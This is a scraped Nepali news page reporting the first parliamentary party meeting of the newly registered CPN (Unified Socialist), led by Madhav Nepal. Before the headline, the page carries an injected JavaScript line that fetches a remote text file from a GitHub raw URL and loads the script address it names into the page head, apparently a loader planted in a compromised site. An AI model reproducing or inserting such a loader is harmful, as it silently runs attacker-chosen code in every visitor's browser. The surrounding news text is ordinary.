;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेकपा (एकीकृत समाजवादी) को पहिलो संसदीयदलको बैठक आज बस्दै, – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • नेकपा (एकीकृत समाजवादी) को पहिलो संसदीयदलको बैठक आज बस्दै,
Breaking News

नेकपा (एकीकृत समाजवादी) को पहिलो संसदीयदलको बैठक आज बस्दै,

जुनेली न्यूज, काठमाण्डौ | नयाँ दल दर्ता गरेपछि नेकपा (एकीकृत समाजवादी) को पहिलो संसदीयदलको बैठक आज बस्दै छ।नेकपा एमालेबाट अलग भएर माधव नेपालले आफ्नो नेतृत्वमा नेकपा एकीकृत समाजवादी पार्टी गठन गरेका हुन् संसद भवनको ल्होत्से हलमा बिहान ११ बजे बस्ने बैठकले संसदीय दलको नेता, प्रमुख सचेतक र सचेतक चुन्ने छ ।

सरकारमा सहभागी हुने निर्णय गरेको एकीकृत समाजवादीले सचेतक र प्रमुख सचेतक भने केही पछि चयन गर्ने नेता मेटमणि चौधरीले जानकारी दिए। ‘छिट्टै सरकारमा सहभागी हुने भएकाले दलको नेता चयन गर्न लागिएको हो,’ उनले भने।

एकीकृत समाजवादीमा प्रतिनिधिसभामा २३ र राष्ट्रियसभामा सात सांसद छन् ।

फेसबुक प्रतिक्रियाहरु